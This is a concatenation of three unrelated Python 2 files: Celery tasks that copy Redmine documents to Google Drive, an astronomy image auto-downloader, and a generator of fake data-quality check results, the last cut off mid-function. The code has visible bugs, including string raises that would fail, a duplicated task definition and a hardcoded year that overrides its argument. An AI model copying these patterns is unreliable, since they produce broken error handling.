s = simplejson.dumps({'a': a, 'kw': kw})
h = md5(s).hexdigest()
return "%s-lock-%s" % (self.name, h)
def try_acquire_lock(self, *a, **kw):
"""
Check if is already locked, if not, lock it
"""
self.__lock_key = self.lock_key(*a, **kw)
self.__lock = REDIS_CLIENT.lock(self.__lock_key, timeout=self.lock_expire)
self.__locked = self.__lock.acquire(blocking=False)
if self.__locked:
logger.debug("Lock created for %s." % self.name)
return self.__locked
def release_lock(self):
# memcache delete is very slow, but we have to use it to take
# advantage of using add() for atomic locking
if not self.__locked:
return
self.__lock.release()
logger.debug("Released lock for %s with key %s" % (
self.name, self.__lock_key))
def after_return(self, status, retval, task_id, args, kwargs, einfo):
logger.debug("Removing db_session reference and task lock for %s" % self.name)
db_session.remove()
self.release_lock()
def get_projects_with_dmsf_revisions():
projects = db_session.query(Project).filter(
exists().where(and_(Project.id == DmsfFileRevision.project_id, DmsfFileRevision.deleted == 0))).all()
return projects
def get_projects_with_documents():
projects = db_session.query(Project).filter(exists().where(Project.id == Document.project_id)).all()
return projects
@app.task(base=RedmineMigrationTask)
def update_project_tree_structure():
for revision in db_session.query(DmsfFileRevision).filter_by(deleted=0):
create_dmsf_revision_on_drive.delay(revision.id, revision.name)
for attachment in db_session.query(DocumentAttachment):
create_document_attachment_on_drive.delay(attachment.id, attachment.filename)
@app.task(bind=True, base=RedmineMigrationTask, max_retries=10, rate_limit=None)
def create_dmsf_revision_on_drive(self, revision_redmine_id, attachment_name):
if not revision_redmine_id:
raise Exception("revision_redmine_id is required")
if not attachment_name:
raise Exception("attachment_name is required")
if not self.try_acquire_lock():
self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
revision = db_session.query(DmsfFileRevision).filter_by(id=revision_redmine_id).first()
if not revision:
logger.error("No dmsf revision with id %s", revision_redmine_id)
raise "Bad dmsf revision id passed" % revision_redmine_id
folder = revision.folder
print "revision folder %s" % revision.folder
if not folder:
folder = revision.dmsf_file.folder
print " file folder %s" % revision.dmsf_file.folder
if not folder:
# place on root DMSF
if len(revision.project.drive_dmsf) == 0 or not revision.project.drive_dmsf[0].drive_id:
logger.info("Project DMSF Folder %s has no drive mapping, calling creation, will retry",
revision.project.name)
create_project_dmsf_folder_on_drive.delay(project_redmine_id=revision.project.id,
project_name=revision.project.name)
self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
parent_drive_id = revision.project.drive_dmsf[0].drive_id
else:
if len(folder.drive) == 0 or not folder.drive[0].drive_id:
logger.info("DMSF Folder %s has no drive mapping, calling creation, will retry",
revision.dmsf_file.folder.title)
create_dmsf_folder_on_drive.delay(folder_redmine_id=revision.dmsf_file.folder.id,
folder_name=revision.dmsf_file.folder.title)
self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
parent_drive_id = folder.drive[0].drive_id
local_path = os.path.join(celeryconfig.REDMINE_TO_DRIVE_DMSF_FOLDER,
"p_%s" % revision.project.identifier,
revision.disk_filename)
if not os.path.isfile(local_path):
local_path = os.path.join(celeryconfig.REDMINE_TO_DRIVE_DMSF_FOLDER,
revision.disk_filename)
if not os.path.isfile(local_path):
logger.error("File missing %s", local_path)
filename, file_extension = os.path.splitext(revision.name)
remote_name = "%s (redmine version %d.%d)%s" % (
filename, revision.major_version, revision.minor_version, file_extension)
version = (revision.major_version * 10000) + revision.minor_version
description = "Created from DMSF revision id %s\nTitle: %s\nComment: %s\nDescription: %s" % \
(revision.id, revision.title, revision.comment, revision.description)
return create_single_version_file_on_drive(self,
parent_drive_id=parent_drive_id,
redmine_type="dmsf_file_revision",
redmine_id=revision_redmine_id,
file_name=remote_name,
local_path=local_path,
description=description,
mime_type=revision.mime_type,
version=version,
modified_date=revision.updated_at)
@app.task(bind=True, base=RedmineMigrationTask, max_retries=10, rate_limit=None)
def create_document_attachment_on_drive(self, attachment_redmine_id, attachment_name):
if not attachment_redmine_id:
raise Exception("attachment_redmine_id is required")
if not attachment_name:
raise Exception("attachment_name is required")
if not self.try_acquire_lock():
self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
attachment = db_session.query(DocumentAttachment).filter_by(id=attachment_redmine_id).first()
if not attachment:
logger.error("No document attachment with id %s", attachment_redmine_id)
raise "Bad attachment id passed" % attachment_redmine_id
if len(attachment.document.drive) == 0 or not attachment.document.drive[0].drive_id:
logger.info("Document %s has no drive mapping, calling creation, will retry", attachment.document.title)
create_document_folder_on_drive.delay(document_redmine_id=attachment.document.id,
document_name=attachment.document.title)
self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
if attachment.disk_directory:
local_path = os.path.join(celeryconfig.REDMINE_TO_DRIVE_FILES_FOLDER, attachment.disk_directory,
attachment.disk_filename)
else:
local_path = os.path.join(celeryconfig.REDMINE_TO_DRIVE_FILES_FOLDER, attachment.disk_filename)
return create_single_version_file_on_drive(self,
parent_drive_id=attachment.document.drive[0].drive_id,
redmine_type="document_attachment",
redmine_id=attachment_redmine_id,
file_name=attachment.filename,
local_path=local_path,
description=attachment.description,
mime_type=attachment.content_type,
version=1,
modified_date=attachment.created_on)
@app.task(bind=True, base=RedmineMigrationTask, max_retries=10, rate_limit=None)
def create_document_folder_on_drive(self, document_redmine_id, document_name):
if not document_redmine_id:
raise Exception("document_redmine_id is required")
if not document_name:
raise Exception("document_name is required")
if not self.try_acquire_lock():
self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
document = db_session.query(Document).filter_by(id=document_redmine_id).first()
if not document:
logger.error("No document with id %s", document_redmine_id)
raise "Bad document id passed" % document_redmine_id
if len(document.project.drive_documents) == 0 or not document.project.drive_documents[0].drive_id:
logger.info("Project %s has no drive documents mapping, calling creation, will retry", document.project.name)
create_project_documents_folder_on_drive.delay(project_redmine_id=document.project.id,
project_name=document.project.name)
self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
return create_folder_on_drive(self, document.project.drive_documents[0].drive_id, 'document',
document_redmine_id, document.title)
@app.task(bind=True, base=RedmineMigrationTask, max_retries=10, rate_limit=None)
def create_dmsf_folder_on_drive(self, folder_redmine_id, folder_name):
if not folder_redmine_id:
raise Exception("folder_redmine_id is required")
if not folder_name:
raise Exception("folder_name is required")
if not self.try_acquire_lock():
self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
folder = db_session.query(DmsfFolder).filter_by(id=folder_redmine_id).first()
if not folder:
logger.error("No DMSF Folder with id %s", folder_redmine_id)
raise "Bad DMSF id passed" % folder_redmine_id
if folder.parent:
if len(folder.parent.drive) == 0 or not folder.parent.drive[0].drive_id:
logger.info("Parent DMSF Folder %s of %s has no drive mapping, calling creation, will retry",
folder.parent.title, folder.title)
create_dmsf_folder_on_drive.delay(folder_redmine_id=folder.parent.id, folder_name=folder.parent.title)
self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
return create_folder_on_drive(self, folder.parent.drive[0].drive_id, 'dmsf_folder',
folder_redmine_id, folder.title)
else:
if len(folder.project.drive_dmsf) == 0 or not folder.project.drive_dmsf[0].drive_id:
logger.info("Project DMSF Folder %s has no drive mapping, calling creation, will retry",
folder.project.name)
create_project_dmsf_folder_on_drive.delay(project_redmine_id=folder.project.id,
project_name=folder.project.name)
self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
return create_folder_on_drive(self, folder.project.drive_dmsf[0].drive_id, 'dmsf_folder',
folder_redmine_id, folder.title)
@app.task(bind=True, base=RedmineMigrationTask, max_retries=10, rate_limit=None)
def create_dmsf_folder_on_drive(self, folder_redmine_id, folder_name):
if not folder_redmine_id:
raise Exception("folder_redmine_id is required")
if not folder_name:
raise Exception("folder_name is required")
if not self.try_acquire_lock():
self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
folder = db_session.query(DmsfFolder).filter_by(id=folder_redmine_id).first()
if not folder:
logger.error("No DMSF Folder with id %s", folder_redmine_id)
raise "Bad DMSF id passed" % folder_redmine_id
if folder.parent:
if len(folder.parent.drive) == 0 or not folder.parent.drive[0].drive_id:
logger.info("Parent DMSF Folder %s of %s has no drive mapping, calling creation, will retry",
folder.parent.title, folder.title)
create_dmsf_folder_on_drive.delay(folder_redmine_id=folder.parent.id, folder_name=folder.parent.title)
self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
return create_folder_on_drive(self, folder.parent.drive[0].drive_id, 'dmsf_folder',
folder_redmine_id, folder.title)
else:
if len(folder.project.drive_dmsf) == 0 or not folder.project.drive_dmsf[0].drive_id:
logger.info("Project DMSF Folder %s has no drive mapping, calling creation, will retry",
folder.project.name)
create_project_dmsf_folder_on_drive.delay(project_redmine_id=folder.project.id,
project_name=folder.project.name)
self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
return create_folder_on_drive(self, folder.project.drive_dmsf[0].drive_id, 'dmsf_folder',
folder_redmine_id, folder.title)
@app.task(bind=True, base=RedmineMigrationTask, max_retries=10, rate_limit=None)
def create_project_dmsf_folder_on_drive(self, project_redmine_id, project_name):
if not project_redmine_id:
raise Exception("project_redmine_id is required")
if not project_name:
raise Exception("folder_name is required")
if not self.try_acquire_lock():
self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
project = db_session.query(Project).filter_by(id=project_redmine_id).first()
if not project:
logger.error("No project with id %s", project_redmine_id)
raise "Bad project id passed" % project_redmine_id
if len(project.drive_project) == 0 or not project.drive_project[0].drive_id:
logger.info("Project %s has no drive mapping, calling creation, will retry", project.name)
create_project_folder_on_drive.delay(project_redmine_id=project.id, project_name=project.name)
self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
return create_folder_on_drive(self, project.drive_project[0].drive_id, 'project_dmsf',
project_redmine_id, "DMSF Folders")
@app.task(bind=True, base=RedmineMigrationTask, max_retries=10, rate_limit=None)
def create_project_documents_folder_on_drive(self, project_redmine_id, project_name):
if not project_redmine_id:
raise Exception("project_redmine_id is required")
if not project_name:
raise Exception("folder_name is required")
if not self.try_acquire_lock():
self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
project = db_session.query(Project).filter_by(id=project_redmine_id).first()
if not project:
logger.error("No project with id %s", project_redmine_id)
raise "Bad project id passed" % project_redmine_id
if len(project.drive_project) == 0 or not project.drive_project[0].drive_id:
logger.info("Project %s has no drive mapping, calling creation, will retry", project.name)
create_project_folder_on_drive.delay(project_redmine_id=project.id, project_name=project.name)
self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
return create_folder_on_drive(self, project.drive_project[0].drive_id, 'project_docs',
project_redmine_id, "Documents")
@app.task(bind=True, base=RedmineMigrationTask, max_retries=10, rate_limit=None)
def create_project_folder_on_drive(self, project_redmine_id, project_name):
if not project_redmine_id:
raise Exception("project_redmine_id is required")
if not project_name:
raise Exception("folder_name is required")
if not self.try_acquire_lock():
self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
project = db_session.query(Project).filter_by(id=project_redmine_id).first()
if not project:
logger.error("No project with id %s", project_redmine_id)
raise "Bad project id passed" % project_redmine_id
if project.parent:
if len(project.parent.drive_project) == 0 or not project.parent.drive_project[0].drive_id:
logger.info("Parent Project %s of %s has no drive mapping, calling creation, will retry",
project.parent.name, project.name)
create_project_folder_on_drive.delay(project_redmine_id=project.parent_id, project_name=project.parent.name)
self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
return create_folder_on_drive(self, project.parent.drive_project[0].drive_id, 'project',
project_redmine_id, project.name)
else:
basedir_id = get_basedir()
if not basedir_id:
logger.info("Project %s has no parent and basedir is missing, calling creation, will retry", project.name)
create_basedir.delay()
self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
return create_folder_on_drive(self, basedir_id, 'project',
project_redmine_id, project.name)
@app.task(bind=True, base=RedmineMigrationTask, max_retries=10, rate_limit=None)
def create_basedir(self):
basedir = db_session.query(RedmineBasedirToDriveMapping).filter_by(redmine_id=0).first()
if basedir and basedir.drive_id:
return basedir.drive_id
return create_folder_on_drive(self, 'root', 'basedir', 0, celeryconfig.REDMINE_TO_DRIVE_BASE_DIR)
def create_folder_on_drive(task, parent_drive_id, redmine_type, redmine_id, folder_name):
if not parent_drive_id:
raise Exception("parent_drive_id is required")
if not redmine_type:
raise Exception("redmine_type is required")
if redmine_id is None:
raise Exception("redmine_id is required")
if not folder_name:
raise Exception("folder_name is required")
db_mapping = db_session.query(RedmineToDriveMapping).filter_by(redmine_id=redmine_id).filter_by(
mapping_type=redmine_type).first()
if db_mapping and db_mapping.drive_id:
logger.info("Folder %s already mapped to %s", folder_name, db_mapping.drive_id)
return
if not db_mapping:
try:
db_mapping = RedmineToDriveMapping(redmine_id=redmine_id, mapping_type=redmine_type,
last_update=datetime.datetime.utcnow())
db_session.add(db_mapping)
db_session.commit()
logger.info("Created mapping for %s %s id:%s", redmine_type, folder_name, redmine_id)
except IntegrityError, e:
logger.info("Cannot create mapping due to duplicate, will retry: %s", e)
db_session.rollback()
task.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
page_token = None
while True:
try:
param = {
'q': "title='%s'" % folder_name,
}
if page_token:
param['pageToken'] = page_token
children = drive_service.children().list(folderId=parent_drive_id, **param).execute()
for child in children.get('items', []):
redmine_id = child['id']
logger.info("Found remote folder %s with id %s, adding to db", folder_name, redmine_id)
db_mapping.drive_id = redmine_id
db_mapping.last_update = datetime.datetime.utcnow()
db_session.commit()
return redmine_id
page_token = children.get('nextPageToken')
if not page_token:
logger.info("Creating drive folder for %s %s id:%s", redmine_type, folder_name, redmine_id)
# Create a folder on Drive, returns the newely created folders ID
body = {
'title': folder_name,
'mimeType': "application/vnd.google-apps.folder",
'parents': [{'id': parent_drive_id}]
}
m_folder = drive_service.files().insert(body=body).execute()
db_mapping.drive_id = m_folder['id']
db_session.commit()
logger.info("Created drive folder for %s %s id:%s", redmine_type, folder_name, redmine_id)
return db_mapping.drive_id
except errors.HttpError, error:
logger.info("Cannot create drive folder for %s %s id:%s: %s", redmine_type, folder_name, redmine_id,
error)
def create_single_version_file_on_drive(task, parent_drive_id, redmine_type, redmine_id,
file_name, local_path, description, mime_type,
version, modified_date):
if not parent_drive_id:
raise Exception("parent_drive_id is required")
if not redmine_type:
raise Exception("redmine_type is required")
if redmine_id is None:
raise Exception("redmine_id is required")
if not file_name:
raise Exception("folder_name is required")
if not local_path:
raise Exception("local_path is required")
if not os.path.isfile(local_path):
raise Exception("local_path %s is missing" % local_path)
db_mapping = db_session.query(RedmineToDriveMapping).filter_by(redmine_id=redmine_id).filter_by(
mapping_type=redmine_type).first()
if db_mapping and db_mapping.drive_id:
logger.info("File %s already mapped to %s", file_name, db_mapping.drive_id)
return
if not db_mapping:
try:
db_mapping = RedmineToDriveMapping(redmine_id=redmine_id, mapping_type=redmine_type,
last_update=datetime.datetime.utcnow())
db_session.add(db_mapping)
db_session.commit()
logger.info("Created mapping for %s %s id:%s", redmine_type, file_name, redmine_id)
except IntegrityError, e:
logger.info("Cannot create mapping due to duplicate, will retry: %s", e)
db_session.rollback()
task.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
page_token = None
while True:
try:
param = {
'q': "title='%s'" % file_name,
}
if page_token:
param['pageToken'] = page_token
children = drive_service.children().list(folderId=parent_drive_id, **param).execute()
for child in children.get('items', []):
redmine_id = child['id']
logger.info("Found remote file %s with id %s, adding to db", file_name, redmine_id)
db_mapping.drive_id = redmine_id
db_mapping.last_update = datetime.datetime.utcnow()
db_session.commit()
return redmine_id
page_token = children.get('nextPageToken')
if not page_token:
logger.info("Creating file for %s %s id:%s", redmine_type, file_name, redmine_id)
if not mime_type or mime_type == '':
mime_type = magic.from_file(local_path, mime=True)
logger.info("Replaced missing mimetype for %s to %s", file_name, mime_type)
# Create the file on Drive
media_body = MediaFileUpload(local_path, mimetype=mime_type, resumable=True)
body = {
'title': file_name,
'mimeType': mime_type
}
if modified_date:
body['modifiedDate'] = modified_date.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
body['description'] = description + "\nCreated from %s id %s" % (redmine_type, redmine_id)
body['version'] = version
body['parents'] = [{'id': parent_drive_id}]
m_file = drive_service.files().insert(body=body, media_body=media_body,
useContentAsIndexableText=True,
pinned=True).execute()
db_mapping.drive_id = m_file['id']
db_session.commit()
logger.info("Created file for %s %s id:%s", redmine_type, file_name, redmine_id)
return db_mapping.drive_id
except errors.HttpError, error:
logger.info("Cannot create file for %s %s id:%s: %s", redmine_type, file_name, redmine_id,
error)
| |
"""Code to auto-download images.
Note: instantiate only one of these per instrument, regardless of how many copies
of ExposeStatusWdg there are, to avoid downloading duplicate images.
2009-05-05 ROwen Extracted from ExposeModel.py and improved to support various modes
2009-05-06 ROwen Modified to use getEvery download preference isntead of autoGet.
2009-07-09 ROwen Removed unused import of Tkinter (found by pychecker).
Removed unusable test code (found by pychecker).
2011-06-16 ROwen Ditched obsolete "except (SystemExit, KeyboardInterrupt): raise" code
2011-07-21 ROwen Renamed instModel to exposeModel for improved clarity.
2011-07-27 ROwen Updated for new location of HubModel.
2012-08-10 ROwen Updated for RO.Comm 3.0.
2014-09-17 ROwen Bug fix: __all__ was mis-set.
"""
__all__ = ['FileGetter']
import collections
import os
import sys
import RO.Alg
import RO.Astro.ImageWindow
import RO.CnvUtil
import RO.DS9
import RO.KeyVariable
import RO.SeqUtil
import RO.StringUtil
import TUI.TUIModel
import TUI.Models.HubModel
class FileGetter (object):
def __init__(self, exposeModel):
self.exposeModel = exposeModel
self.instName = self.exposeModel.instName
self.ds9WinDict = {}
self.hubModel = TUI.Models.HubModel.getModel()
self.tuiModel = TUI.TUIModel.getModel()
# set of active downloads; each entry is an HTTPGet object
self.activeDownloads = set()
# queue of pending downloads; each entry is a list of keyword argument dictionaries
# for the download widget's getFile method (one dict per camera, e.g. red and blue for DIS)
self.pendingDownloadArgs = collections.deque()
self.nSkipped = 0
downloadTL = self.tuiModel.tlSet.getToplevel("TUI.Downloads")
self.downloadWdg = downloadTL and downloadTL.getWdg()
if self.downloadWdg:
# set up automatic ftp; we have all the info we need
self.exposeModel.files.addCallback(self._updFiles)
def _downloadFinished(self, camName, httpGet):
"""Call when an image file has been downloaded"""
# print "%s._downloadFinished(camName=%s, httpGet=%s)" % (self.__class__.__name__, camName, httpGet)
try:
self.activeDownloads.remove(httpGet)
except Exception:
sys.stderr.write("FileGetter internal error: could not remove completed httpGet from activeDownloads\n")
# start next download if current set finished
self._handlePendingDownloads()
# display image if display wanted and camera name known and download succeeded
# print "viewImageVarCont=%r" % (self.exposeModel.viewImageVarCont.get())
if self.exposeModel.viewImageVarCont.get() and (camName is not None) and (httpGet.state == httpGet.Done):
ds9Win = self.ds9WinDict.get(camName)
try:
if not ds9Win:
if camName not in self.exposeModel.instInfo.camNames:
raise RuntimeError("Unknown camera name %r for %s" % (camName, self.instName))
if camName:
ds9Name = "%s_%s" % (self.instName, camName)
else:
ds9Name = self.instName
ds9Win = RO.DS9.DS9Win(ds9Name, doOpen=True)
self.ds9WinDict[camName] = ds9Win
elif not ds9Win.isOpen():
ds9Win.doOpen()
ds9Win.showFITSFile(httpGet.toPath)
except Exception as e:
self.tuiModel.logMsg(
msgStr = RO.StringUtil.strFromException(e),
severity = RO.Constants.sevError,
)
def _updFiles(self, fileInfo, isCurrent, keyVar):
"""Call whenever a file is written
to start an ftp download (if appropriate).
fileInfo consists of:
- cmdr (progID.username)
- host
- common root directory
- program and date subdirectory
- user subdirectory
- file name(s) for most recent exposure
"""
if not isCurrent:
return
if not keyVar.isGenuine():
# cached; avoid redownloading
return
# print "_updFiles(%r, %r)" % (fileInfo, isCurrent)
getEveryNum = self.exposeModel.getEveryVarCont.get()
if getEveryNum == 0:
# no downloads wanted
self.pendingDownloadArgs.clear()
return
cmdr, dumHost, dumFromRootDir, progDir, userDir = fileInfo[0:5]
progID, username = cmdr.split(".")
fileNames = fileInfo[5:]
host, fromRootDir = self.hubModel.httpRoot.get()[0]
if None in (host, fromRootDir):
errMsg = "Cannot download images; hub httpRoot keyword not available"
self.tuiModel.logMsg(errMsg, RO.Constants.sevWarning)
return
if self.tuiModel.getProgID() not in (progID, "APO"):
# files are for a different program; ignore them unless user is APO
return
if not self.exposeModel.getCollabPref.getValue() and username != self.tuiModel.getUsername():
# files are for a collaborator and we don't want those
return
toRootDir = self.exposeModel.ftpSaveToPref.getValue()
# save in userDir subdirectory of ftp directory
argList = []
for ii, fileName in enumerate(fileNames):
if fileName == "None":
continue
dispStr = "".join((progDir, userDir, fileName))
fromURL = "".join(("http://", host, fromRootDir, progDir, userDir, fileName))
toPath = os.path.join(toRootDir, progDir, userDir, fileName)
camName = RO.SeqUtil.get(self.exposeModel.instInfo.camNames, ii)
doneFunc = RO.Alg.GenericCallback(self._downloadFinished, camName)
if camName is None:
self.tuiModel.logMsg(
"More files than known cameras for image %s" % fileName,
severity = RO.Constants.sevWarning,
)
argList.append(dict(
fromURL = fromURL,
toPath = toPath,
isBinary = True,
overwrite = False,
createDir = True,
dispStr = dispStr,
doneFunc = doneFunc,
))
self.pendingDownloadArgs.append(argList)
self._handlePendingDownloads()
def _handlePendingDownloads(self):
"""Examine pending downloads and start next download, if appropriate"""
# print "%s._handlePendingDownloads(); there are %s active and %s pending downloads" % \
# (self.__class__.__name__, len(self.activeDownloads), len(self.pendingDownloadArgs),)
getEveryNum = self.exposeModel.getEveryVarCont.get()
if getEveryNum == 0:
# no downloads wanted
# print "No downloads wanted; clearing pending downloads"
self.pendingDownloadArgs.clear()
return
if self.activeDownloads:
# make sure these are all truly active; this should never happen,
# but the consequences are severe so be paranoid
trulyActiveDownloads = [dl for dl in self.activeDownloads if not dl.isDone]
if len(trulyActiveDownloads) != len(self.activeDownloads):
# print "warning: purging activeDownloads of %d completed downloads" % \
# (len(self.activeDownloads) - len(trulyActiveDownloads))
self.activeDownloads = set(trulyActiveDownloads)
if self.activeDownloads:
# print "There are %d active downloads; don't start a new one" % (len(self.activeDownloads),)
return
argList = []
if getEveryNum > 0:
# nToSkip = getEveryNum - 1
nPending = len(self.pendingDownloadArgs)
if nPending >= getEveryNum:
# print "Purge first %d entries from pendingDownloads and download the next" % (getEveryNum-1,)
# deques don't handle slicing, unfortunately
for x in range(getEveryNum-1):
del(self.pendingDownloadArgs[0])
argList = self.pendingDownloadArgs.popleft()
# else:
# print "There are not enough pending downloads yet; waiting"
elif getEveryNum < 0:
# start most recent images; ditch the rest
# print "Download last image in pending downloads and clear the rest"
if self.pendingDownloadArgs:
argList = self.pendingDownloadArgs.pop()
self.pendingDownloadArgs.clear()
for argDict in argList:
httpGet = self.downloadWdg.getFile(**argDict)
if not httpGet.isDone:
try:
self.activeDownloads.add(httpGet)
except Exception:
# print "self.activeDownloads=%r" % (self.activeDownloads,)
raise
| |
#!/usr/bin/env python2
""" Generate demo test-results data.
This program is used to create fake results from daily runs against a
hypothetical user database called "Westwind". This hypothetical
database has the following tables within it:
- cust_type - a small, non-partitioned lookup table with 5 rows
- asset_type - a small, non-partitioned lookup table with 5 rows
- cust_asset_events - a large, partitioned fact table
There are three tests for the two lookup tables, and six for the large
fact table that run daily. The program generates one run for every day
from 2015-01-01 to 2015-12-31. A small random number of tests will find
violations. The user tables that this demo creates tests for include:
- cust_type (~ 5 rows)
- asset_type (~ 5 rows)
- event_type (~ 5 rows)
- dates (~ 3650 rows)
- locations (tbd)
- customers (~ 10,000 rows)
- assets (~ 10,000,000 rows)
- cust_asset_events (~ 3,000,000,000 rows) = avg of 1 event/asset/day for 7 years
- cust_asset_event_month (~ 840,000,000 rows) = 1 row/asset/month for 7 years
This results data will be written by default to /tmp/inspector_demo.sqlite.
4380 records will be written to this comma-delimited csv file without
any quotes. The fields are in the following order:
- instance_name STRING (always 'prod')
- database_name STRING (always 'westwind')
- table_name STRING
- run_start_timestamp TIMESTAMP (YYYY-MM-DD HH:MM:SS)
- check_name STRING
- check_policy_type STRING ('quality' or 'data-management')
- check_type STRING ('rule')
- run_check_mode STRING ('full' or 'incremental')
- run_check_rc INTEGER (always 0)
- run_check_violation_cnt INTEGER
- run_check_scope INTEGER (0-100)
- run_check_unit STRING ('tables' or 'rows')
- run_check_severity_score INTEGER (0-100)
These fields were initially included but have been taken out for now:
#- table_partitioned INTEGER (1=True, 0=False)
#- run_mode STRING ('full' or 'incremental')
#- partition_key STRING ('' or 'date_id')
#- partition_value STRING (5-digit julian date for partitioned tables)
#- run_check_start_timestamp TIMESTAMP (YYYY-MM-DD HH:MM:SS)
#- run_check_end_timestamp TIMESTAMP (YYYY-MM-DD HH:MM:SS)
#- run_check_anomaly_score INTEGER (always 0)
This source code is protected by the BSD license. See the file "LICENSE"
in the source code root directory for the full language or refer to it here:
http://opensource.org/licenses/BSD-3-Clause
Copyright 2015 Will Farmer and Ken Farmer
"""
from __future__ import division
import os, sys
import random
import argparse
import time, datetime
from os.path import join as pjoin
from os.path import isfile, isdir, exists, dirname, basename
import csv
import random
import json
from pprint import pprint as pp
sys.path.insert(0, dirname(dirname(os.path.abspath(__file__))))
import hadoopinspector.core as core
__version__ = '0.0.2'
user_tables = {}
def main():
global user_tables
args = get_args()
if args.dirname:
fn = pjoin(args.dirname, 'instance-%s_db-%s_config.json' % (args.user_instance, args.user_db))
else:
fn = 'instance-%s_db-%s_config.json' % (args.user_instance, args.user_db)
with open(fn, 'r') as f:
user_tables = json.load(f)
create_test_file(args.user_instance, args.user_db, args.outfile)
print('Demo file created: %s' % args.outfile)
def create_test_file(user_instance, user_db, output_filename):
for month_of_year in range(1,13):
print("generating month: %d" % month_of_year)
for day_of_month in range(1, get_month_days(month_of_year)+1):
run_start_datetime = get_run_start_datetime(2014, month_of_year, day_of_month)
check_results = core.CheckResults(output_filename)
for table_name in user_tables:
for check_name in user_tables[table_name]['checks']:
#curr_datetime = get_curr_datetime(curr_datetime, run_start_datetime)
#row_dict['table_partitioned'] = get_table_partitioned(user_tables[table_name]['partition_key'])
#row_dict['run_start_timestamp'] = get_ts_from_dt(run_start_datetime)
#row_dict['run_mode'] = user_tables[table_name]['mode']
#row_dict['partition_key'] = get_partition_key(user_tables[table_name]['partition_key'])
#row_dict['partition_value'] = get_partition_value(row_dict['run_mode'], curr_datetime)
#row_dict['run_check_start_timestamp'] = get_ts_from_dt(curr_datetime)
#row_dict['run_check_end_timestamp'] = get_ts_from_dt(curr_datetime + datetime.timedelta(seconds=1))
default_severity_name = user_tables[table_name]['checks'][check_name]['severity']
default_severity_score = convert_severity(default_severity_name)
scope = get_scope(user_tables[table_name]['partition_key'],
user_tables[table_name]['partition_row_cnt_avg'],
user_tables[table_name]['checks'][check_name]['violation_unit'],
get_violation_cnt(table_name, check_name))
check_results.add(user_instance,
user_db,
table_name,
check_name,
get_violation_cnt(table_name, check_name),
'0',
'active',
get_check_type(user_tables[table_name]['checks'][check_name]['check_type']),
get_check_policy_type(user_tables[table_name]['checks'][check_name]['policy_type']),
get_run_check_mode(user_tables[table_name]['mode'],
user_tables[table_name]['checks'][check_name]['mode']),
user_tables[table_name]['checks'][check_name]['violation_unit'],
scope,
get_severity_score(default_severity_score, scope),
run_start_timestamp=run_start_datetime,
run_stop_timestamp=(run_start_datetime + datetime.timedelta(hours=1))
)
check_results.write_to_sqlite()
def get_violation_cnt(table_name, check_name):
mode = user_tables[table_name]['mode']
partition_key = user_tables[table_name]['partition_key']
avg_row_cnt = user_tables[table_name]['partition_row_cnt_avg']
violation_unit = user_tables[table_name]['checks'][check_name]['violation_unit']
failure_rate = user_tables[table_name]['checks'][check_name].get('failure_rate', 0.1)
if random.random() < failure_rate:
if violation_unit == 'table':
return 1
else:
if partition_key is None and random.random() < 0.5:
# screwed up the all rows, probably because you reloaded 100% of
# the data wrong. Maybe due to:
# - loaded same data twice
# - failed to load
return int(avg_row_cnt)
else:
# screwed up a subset of rows, probably a subset of a single
# partition
return int(avg_row_cnt * random.random())
else:
return 0
def get_partition_value(run_mode, curr_datetime):
if run_mode is None:
return None
else:
tt = curr_datetime.timetuple()
return '%d%03d' % (tt.tm_year, tt.tm_yday)
def get_run_check_mode(run_mode, check_mode):
if run_mode == 'incremental' and check_mode == 'incremental':
return 'incremental'
else:
return 'full'
def convert_severity(in_val):
if in_val is None:
return 0
elif in_val == 'low':
return 10
elif in_val == 'medium':
return 50
elif in_val == 'high':
return 100
else:
print('error: invalid convert_severity in_val: %s' % in_val)
sys.exit(1)
def get_scope(partition_key, avg_row_cnt, violation_unit, violation_cnt):
""" Returns the scope of the violations.
Range is 0 to 100 - 100 being the greatest scope
"""
assert isnumeric(violation_cnt)
assert isnumeric(avg_row_cnt)
if not violation_cnt:
return 0
elif violation_unit == 'tables':
return 100
else:
if partition_key is None:
return (violation_cnt / avg_row_cnt) * 100
else:
# assumes 100 partitions, or maybe more but recent
# data is more valuable
return (violation_cnt / avg_row_cnt)
def get_severity_score(default_severity_score, scope):
""" Returns the severity of the violations.
Range is 0 to 100 - 100 being the most severe.
"""
assert isnumeric(default_severity_score)
assert isnumeric(scope)
severity_score = (scope * default_severity_score) / 100
if severity_score == 0:
return 0
else:
return int(max(1, min(100, severity_score)))
def get_partition_key(raw_partition_key):
if raw_partition_key is None:
return ''
else:
return raw_partition_key
def get_instance_name():
return 'prod'
def get_database_name():
return 'westwind'
def get_table_partitioned(partition_key):
if partition_key is not None and partition_key != '':
return '1'
else:
return '0'
def get_run_start_datetime(year, month, day):
hour = 2
minute = 0
second = 0
d = datetime.datetime(2015, month, day, hour, minute, second)
return d
def get_ts_from_dt(dt):
ts_format = '%Y-%m-%d %H:%M:%S'
return dt.strftime(ts_format)
def get_curr_datetime(curr_datetime, run_start_datetime):
if curr_datetime is None:
# first time used
return run_start_datetime
elif curr_datetime > run_start_datetime:
# after the first tie for a day
return curr_datetime + datetime.timedelta(seconds=1)
else:
# first time for a day
return run_start_datetime
def get_month_days(month_of_year):
if month_of_year in (1,3,5,7,8,10,12):
return 31
elif month_of_year in (2,):
return 28
else:
